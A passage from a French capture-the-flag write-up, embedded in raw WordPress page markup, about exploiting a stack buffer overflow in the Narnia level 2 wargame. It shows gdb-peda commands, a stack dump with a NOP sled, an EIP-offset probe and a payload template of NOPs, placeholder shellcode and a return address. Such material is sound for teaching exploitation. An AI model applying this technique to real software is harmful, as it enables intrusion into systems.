readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>break *main+68<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-394d1f1 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"394d1f1\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-533fbe7\" data-id=\"533fbe7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b449e6 elementor-widget elementor-widget-text-editor\" data-id=\"1b449e6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Lancer le programme :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bacb281 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bacb281\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f9d15eb\" data-id=\"f9d15eb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-86afc40 elementor-widget elementor-widget-code-highlight\" data-id=\"86afc40\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>run<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0e74689 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"0e74689\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5dd4c69\" data-id=\"5dd4c69\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-99359ba elementor-widget elementor-widget-text-editor\" data-id=\"99359ba\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le programme d\u00e9file jusqu\u2019au prochain <strong>breakpoint.<\/strong><\/p>\n<p>\u00a0<\/p>\n<p>Afficher le contenu de la pile, afin de connaitre l\u2019adresse de retour que l\u2019on pourra utiliser :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f139344 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f139344\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-91f015f\" data-id=\"91f015f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3517fcd elementor-widget elementor-widget-code-highlight\" data-id=\"3517fcd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>x\/100x $esp<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-eaa6449 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"eaa6449\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-060a5f7\" data-id=\"060a5f7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c38b25d elementor-widget elementor-widget-text-editor\" data-id=\"c38b25d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p>Le premier <code>x<\/code> signifie \u201cE<strong>x<\/strong>amine memory\u201d.<\/p>\n<\/blockquote>\n<blockquote>\n<p><code>\/100x<\/code> signifie \u201caffiche les 100 valeurs suivantes en hexad\u00e9cimal\u201d.<\/p>\n<\/blockquote>\n<p>Voici le r\u00e9sultat :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-afac605 elementor-widget elementor-widget-code-highlight\" data-id=\"afac605\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>gdb-peda$ x\/100x $esp\r\n0xffffd400:     0x0804a01c      0xffffd408      0x90909090      0x90909090\r\n0xffffd410:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd420:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd430:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd440:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd450:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd460:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd470:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd480:     0x90909090      0x90909090      0x90909090      0x90909090\r\n0xffffd490:     0x90909090      0x90909090      0x90909090      0xff009090\r\n0xffffd4a0:     0xf7fab000      0x08049196      0x00000002      0xffffd544\r\n0xffffd4b0:     0xf7fab000      0xffffd544      0xf7ffcb80      0xf7ffd020\r\n0xffffd4c0:     0x89760a03      0xc2968013      0x00000000      0x00000000\r\n0xffffd4d0:     0x00000000      0xf7ffcb80      0xf7ffd020      0xd8e42900\r\n0xffffd4e0:     0xf7ffda40      0xf7da24a6      0xf7fab000      0xf7da25f3\r\n0xffffd4f0:     0x00000000      0x0804b0d8      0xffffd550      0xf7ffd020\r\n0xffffd500:     0x00000000      0xf7fd8ff4      0xf7da256d      0x0804b1c8\r\n0xffffd510:     0x00000002      0x08049080      0x00000000      0x080490ac\r\n0xffffd520:     0x08049196      0x00000002      0xffffd544      0x00000000\r\n0xffffd530:     0x00000000      0xf7fcaaa0      0xffffd53c      0xf7ffda40\r\n0xffffd540:     0x00000002      0xffffd696      0xffffd6a6      0x00000000\r\n0xffffd550:     0xffffd73d      0xffffd74d      0xffffd75f      0xffffd76f\r\n0xffffd560:     0xffffd784      0xffffd793      0xffffd79c      0xffffd7af\r\n0xffffd570:     0xffffd7bc      0xffffddab      0xffffddb6      0xffffddeb\r\n0xffffd580:     0xffffde0d      0xffffde24      0xffffde2f      0xffffde4f<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2dfe2a8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2dfe2a8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f44b543\" data-id=\"f44b543\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b0891d elementor-widget elementor-widget-text-editor\" data-id=\"8b0891d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>On voit qu&#8217;il y a un bloc de &#8220;\\x90&#8221; allant de l&#8217;adresse\u00a0<span style=\"font-family: monospace;font-size: 18px\">0xffffd400\u00a0<\/span>jusqu&#8217;\u00e0\u00a0<span style=\"font-family: monospace;font-size: 18px\">0xffffd490 <\/span>ce qui repr\u00e9sente notre injection.<\/p>\n<p>Vous pouvez choisir une adresse de retour dans cette plage, au milieu des NOP. Pour ma part, j\u2019ai choisi <code>0xffffd428<\/code>.<\/p>\n<p>Entrez la touche \u2018<code>n<\/code>\u2019 pour passer \u00e0 l\u2019instruction suivante et continuer d\u2019explorer le code si vous le d\u00e9sirez.<\/p>\n<p>Vous avez maintenant tous les ingr\u00e9dients pour construire votre injection.<\/p>\n<p>Il ne vous manque plus qu\u2019\u00e0 trouver le <b>bon nombre de NOP <\/b> pour qu\u2019EIP prenne bien la valeur de l\u2019adresse de retour voulue.<\/p>\n<p>Pour cela, vous pouvez tester dans peda de mettre des A et des B en grande quantit\u00e9, jusqu\u2019\u00e0 trouver la bonne quantit\u00e9.<\/p>\n<p>Par exemple :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-aabb873 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"aabb873\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d13d25f\" data-id=\"d13d25f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ae64145 elementor-widget elementor-widget-code-highlight\" data-id=\"ae64145\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"A\"*150 + \"BBBB\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cd5e518 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cd5e518\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d0aea3f\" data-id=\"d0aea3f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c99d992 elementor-widget elementor-widget-image\" data-id=\"c99d992\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"190\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2.png\" class=\"attachment-large size-large wp-image-562\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2.png 643w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-2-300x89.png 300w\" sizes=\"(max-width: 643px) 100vw, 643px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ab13411 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ab13411\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7b8470f\" data-id=\"7b8470f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6658f2b elementor-widget elementor-widget-text-editor\" data-id=\"6658f2b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Ici, EIP = \u2018AAAA\u2019, cela signifie qu\u2019il y a trop de \u2018A\u2019.<\/p>\n<p>Continuez ainsi jusqu\u2019\u00e0 ce que EIP soit \u00e9gale \u00e0 \u2018BBBB\u2019.<\/p>\n<p>Lorsque c\u2019est le cas, remplacez les \u2018A\u2019 par des NOP + le shellcode, et les B par l\u2019adresse de retour.<\/p>\n<p>\u00a0<\/p>\n<p>Vous obtiendrez une injection de ce format :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fccdf19 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fccdf19\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2fc052d\" data-id=\"2fc052d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-365f2cf elementor-widget elementor-widget-code-highlight\" data-id=\"365f2cf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp> $(python2 -c 'print(\"x90\"*X +\"shellcode\" + \"\\x28\\xd4\\xff\\xff\")')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3c72dbb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3c72dbb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-33c4639\" data-id=\"33c4639\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-523492d elementor-widget elementor-widget-text-editor\" data-id=\"523492d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>o\u00f9 X = taille trouv\u00e9e avec les A &#8211; longueur du shellcode<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-11f5bc6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"11f5bc6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6c841e5\" data-id=\"6c841e5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1ab2756 elementor-widget elementor-widget-text-editor\" data-id=\"1ab2756\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><span class=\"notion-enable-hover\" data-token-index=\"0\"><b>Remarque<\/b><\/span><span class=\"notion-enable-hover\" data-token-index=\"1\"><b> <\/b>: Il est conseill\u00e9 d\u2019ajouter quelques NOP apr\u00e8s le shellcode pour \u00e9viter tout bug. Il faudra en tenir compte dans le calcul.<\/span><\/p>\n<\/blockquote>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fd6b85c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fd6b85c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f91a103\" data-id=\"f91a103\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1c62d24 elementor-widget elementor-widget-heading\" data-id=\"1c62d24\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Conclusion<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-49beb7b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"49beb7b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-99d9bb9\" data-id=\"99d9bb9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c224e53 elementor-widget elementor-widget-text-editor\" data-id=\"c224e53\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>F\u00e9licitations \u00e0 vous si vous avez r\u00e9ussi le challenge ! \ud83e\udd73<\/p>\n<p>Si ce n\u2019est pas le cas, ne vous d\u00e9couragez pas. Il s\u2019agit d\u2019un challenge complexe, qui implique de bien comprendre l\u2019assembleur ainsi que le principe de pile.<\/p>\n<p>Quoi qu\u2019il arrive, je suis s\u00fbre que vous ressortirez de ce challenge avec de nouvelles comp\u00e9tences acquises, comme ce fut le cas pour moi \ud83d\ude0a<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2a0313f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2a0313f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6e43e5a\" data-id=\"6e43e5a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-670e77b elementor-widget elementor-widget-heading\" data-id=\"670e77b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Ressources<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-060df78 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"060df78\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2980dc9\" data-id=\"2980dc9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2b26eae elementor-widget elementor-widget-text-editor\" data-id=\"2b26eae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"https:\/\/stackoverflow.com\/questions\/32455684\/difference-between-real-user-id-effective-user-id-and-saved-user-id\">https:\/\/stackoverflow.com\/questions\/32455684\/difference-between-real-user-id-effective-user-id-and-saved-user-id<\/a><\/p>\n<p><a href=\"https:\/\/man7.org\/linux\/man-pages\/man2\/setreuid.2.html\">https:\/\/man7.org\/linux\/man-pages\/man2\/setreuid.2.html<\/a><\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/43716\">https:\/\/www.exploit-db.com\/exploits\/43716<\/a><\/p>\n<p><a href=\"https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html\">https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html<\/a><\/p>\n<p><a href=\"http:\/\/shell-storm.org\/shellcode\/index.html\">http:\/\/shell-storm.org\/shellcode\/index.html<\/a><\/p>\n<p><a href=\"https:\/\/www.cs.virginia.edu\/~evans\/cs216\/guides\/x86.html\">https:\/\/www.cs.virginia.edu\/~evans\/cs216\/guides\/x86.html<\/a><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Comme \u00e0 l\u2019accoutum\u00e9e, nous nous retrouvons pour le 3\u00e8me challenge de cette s\u00e9rie Narnia. Nous allons d\u00e9couvrir un nouvel outil indispensable pour le challenge, mais aussi approfondir des connaissances vu au cours des pr\u00e9c\u00e9dents challenges. D\u00e9couverte Voici le code source du programme narnia2 : #include #include #include int main(int argc, char * argv[]){ char buf[128];&hellip; <br \/> <a class=\"button small blue\" href=\"https:\/\/mindshield.eu\/index.php\/2023\/03\/06\/narnia-2\/\">Read more<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[8,10,9],"class_list":["post-554","post","type-post","status-publish","format-standard","hentry","category-narnia_challenges","tag-challenge","tag-exploit","tag-shellcode"],"_links":{"self":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/comments?post=554"}],"version-history":[{"count":5,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/posts\/554\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/media?parent=554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/categories?post=554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mindshield.eu\/index.php\/wp-json\/wp\/v2\/tags?post=554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}